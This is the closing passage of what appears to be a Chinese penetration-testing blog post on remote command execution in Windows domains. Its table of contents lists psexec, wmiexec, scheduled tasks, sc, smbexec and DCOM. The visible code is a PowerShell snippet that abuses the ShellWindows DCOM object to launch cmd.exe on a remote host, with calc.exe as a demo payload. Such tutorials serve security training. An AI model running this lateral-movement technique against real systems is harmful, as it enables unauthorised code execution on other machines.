<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$com &#x3D; [Type]::GetTypeFromCLSID(&#39;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#39;,&quot;192.168.0.2&quot;)</span><br><span class="line">$obj &#x3D; [System.Activator]::CreateInstance($com)</span><br><span class="line">$item &#x3D; $obj.item()</span><br><span class="line">$item.Document.Application.ShellExecute(&quot;cmd.exe&quot;,&quot;&#x2F;c calc.exe&quot;,&quot;c:\windows\system32&quot;,$null,0)</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/6.png" alt></p>
<p><strong>注意：</strong></p>
<p>以上两种方式适用于Win7-Win10</p>

  </div>
</article>


    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            visitor: true,
            appId: 'euAQjqlW2tS4fVHxsmyLkdLj-gzGzoHsz',
            appKey: 'Fmn6CIIN9yyDif6AC2hxSglA',
            placeholder: 'ヾﾉ≧∀≦)o来啊，快活啊!',
            avatar: 'robohash'
        })
    </script>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="httP://www.sectime.top:8888">Img</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="http://github.com/mysecroad" target="_blank" rel="noopener">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#域渗透远程执行命令的几种姿势"><span class="toc-number">1.</span> <span class="toc-text">域渗透远程执行命令的几种姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-vmic"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 vmic</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令"><span class="toc-number">1.1.1.</span> <span class="toc-text">常用命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#工具说明"><span class="toc-number">1.1.2.</span> <span class="toc-text">工具说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-psexec"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 psexec</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#使用方法"><span class="toc-number">1.2.1.</span> <span class="toc-text">使用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#执行原理"><span class="toc-number">1.2.2.</span> <span class="toc-text">执行原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#工具说明-1"><span class="toc-number">1.2.3.</span> <span class="toc-text">工具说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-WMIEXEC"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 WMIEXEC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-at-amp-schtasks计划任务"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 at&amp;schtasks计划任务</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#net-use-at"><span class="toc-number">1.4.1.</span> <span class="toc-text">net use + at</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#schtasks"><span class="toc-number">1.4.2.</span> <span class="toc-text">schtasks</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令-1"><span class="toc-number">1.4.3.</span> <span class="toc-text">常用命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-SC添加服务远程执行命令"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 SC添加服务远程执行命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令-2"><span class="toc-number">1.5.1.</span> <span class="toc-text">常用命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-smbexec"><span class="toc-number">1.6.</span> <span class="toc-text">0x05 smbexec</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令-3"><span class="toc-number">1.6.1.</span> <span class="toc-text">常用命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-利用DCOM在远程系统执行程序"><span class="toc-number">1.7.</span> <span class="toc-text">0x06 利用DCOM在远程系统执行程序</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DCOM使用介绍"><span class="toc-number">1.7.1.</span> <span class="toc-text">DCOM使用介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#获得DCOM的程序列表"><span class="toc-number">1.7.1.1.</span> <span class="toc-text">获得DCOM的程序列表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对本机测试"><span class="toc-number">1.7.1.2.</span> <span class="toc-text">对本机测试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对远程系统测试"><span class="toc-number">1.7.1.3.</span> <span class="toc-text">对远程系统测试</span></a></li></ol></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://140.143.122.13/posts/35747.html" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://140.143.122.13/posts/35747.html&text=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://140.143.122.13/posts/35747.html&is_video=false&description=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=域渗透远程执行命令的几种姿势&body=Check out this article: http://140.143.122.13/posts/35747.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://140.143.122.13/posts/35747.html&name=域渗透远程执行命令的几种姿势&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://140.143.122.13/posts/35747.html&t=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2018-2020
    ca5tle
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="httP://www.sectime.top:8888">Img</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="http://github.com/mysecroad" target="_blank" rel="noopener">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
